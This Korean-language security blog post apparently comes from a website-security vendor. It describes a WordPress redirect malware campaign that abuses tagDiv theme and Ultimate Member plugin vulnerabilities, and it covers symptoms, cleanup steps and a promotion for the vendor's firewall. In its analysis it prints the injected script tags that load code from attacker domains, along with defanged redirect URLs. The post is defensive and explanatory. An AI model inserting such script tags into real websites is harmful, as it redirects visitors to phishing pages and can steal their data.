날이 갈수록 웹사이트 방문자를 의심스러운 페이지로 강제 이동시키는 워드프레스 감염 사례가 급증하고 있습니다. 최근에는 tagDiv 테마와 Ultimate Member 플러그인에서 발견된 취약점이 이러한 공격에 활용되고 있으며, 이른바 '워드프레스 리디렉션 해킹'을 통해 사이트 방문자가 피싱 페이지나 악성 페이지로 강제로 연결됩니다.
이 해킹에 노출된 사용자는 다음과 같은 임의의 URL을 가진 성가신 페이지로 리디렉션됩니다.
hxxp://utroro.com/xyzhxxp://murieh.abc/xyzhxxps://unverf.com/xyz
동시에 가짜 reCAPTCHA 이미지가 화면에 표시되며, 안내 문구는 본래의 의도를 숨긴 채 방문자가 브라우저 알림을 허용하도록 유도합니다.

더 큰 문제는 구글(Google)이 해당 사이트를 피싱 및 해킹된 웹사이트로 판정해 블랙리스트에 등재하고 검색 제재를 가할 수 있다는 점입니다. 이 경우 브라우저는 사이트를 방문하려는 사용자에게 경고 메시지를 표시하게 되며, 트래픽과 신뢰도 모두 크게 하락합니다.
삽입된 악성 스크립트
이번 감염에는 cdn.allyouwant.online과 cdn.eeduelements.com, 두 개의 외부 도메인에서 코드가 삽입됩니다. 전자는 이번 악성 캠페인의 후반 단계에서 사용되었고, 후자는 초기 단계에서 사용된 것으로 확인되었습니다.
...<script type='text/javascript' src='hxxps://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script><script type='text/javascript' src='hxxps://cdn.allyouwant.online/main.js?t=lp1'></script></head>...현재까지 cdn.eeduelements.com 스크립트가 삽입된 사이트는 1,700곳 이상, cdn.allyouwant.online 스크립트가 삽입된 사이트는 500곳 이상으로 집계되고 있습니다.
워드프레스 리디렉션 해킹이 걱정되시나요? 지금 보안 전문가에게 문의해 신속하게 복구하세요.
tagDiv 테마의 공격 경로
이번 워드프레스 익스플로잇의 핵심 원인은 tagDiv 테마이며, 여기에 활성 설치 수 10만 개 이상을 기록 중인 인기 플러그인 Ultimate Member에서 최근 발견된(현재는 이미 패치된) 취약점이 결합되었습니다.
구버전 tagDiv 테마에서는 아래와 같은 형태로 악성코드가 삽입됩니다.

Ultimate Member 플러그인의 취약점
Ultimate Member 플러그인에서 발견된 취약점은 '인증되지 않은 임의 파일 업로드(Unauthenticated Arbitrary File Upload)'입니다. 다행히 이 취약점은 2018년 8월 9일자로 이미 수정되었지만, 오랫동안 업데이트하지 않은 사이트는 여전히 위험에 노출되어 있습니다.

워드프레스 리디렉션 캠페인(Ultimate Member 플러그인 익스플로잇)의 주요 증상
- index.php 파일 손상
- /wp-content/plugins/ultimate-member/includes/images/smiles 디렉터리에 출처 불명의 PHP 파일 존재
- 에러 로그에 wp-content/plugins/ultimate-member/assets/dynamic_css/dynamic_profile.php의 5행, 6행 관련 오류 기록
- 웹사이트가 원치 않는 사이트(애드웨어)로 강제 리디렉션됨
- 홈페이지 접속 시 팝업 창 표시
- 신용카드 정보 탈취
- 서버에 알 수 없는 파일 생성
- 워드프레스 및 플러그인 폴더 내 쿼리 파일 변조
- index.php에 의미 없는 난독화 코드 삽입
워드프레스 리디렉션 해킹 대응 방법
이번 워드프레스 리디렉션 감염은 여러 공격 경로와 다양한 변종 악성코드를 동시에 사용합니다. 피해를 예방하고 확산을 막기 위해 다음 조치를 즉시 실행하는 것이 좋습니다.
- 모든 테마와 플러그인을 최신 버전으로 즉시 업데이트합니다.
- HTTP 인증을 설정해 업로드 폴더 내 PHP 파일에 직접 접근하지 못하도록 차단합니다. 이는 악성 파일의 무단 실행을 방지하기 위한 조치입니다.
- tagDiv 감염의 경우, 테마의 관리자 인터페이스에서 악성코드를 탐지·제거할 수 있습니다.
- Ultimate Member 플러그인 익스플로잇의 경우, wp-content/uploads/ultimatemember/temp/ 하위 디렉터리에 있는 모든 PHP 파일을 삭제합니다.
이러한 악성 리디렉션 캠페인은 감염 코드와 침해 대상 파일을 수시로 변경하므로, 정확한 진단과 완전한 제거를 위해서는 보안 전문가의 도움을 받는 것이 가장 안전합니다.
Astra 보안 전문가에게 지금 문의하세요. 강력한 방화벽이 XSS, LFI, RFI, SQL 인젝션, 악성 봇, 자동화 취약점 스캐너 등 80여 가지 보안 위협으로부터 웹사이트를 보호합니다.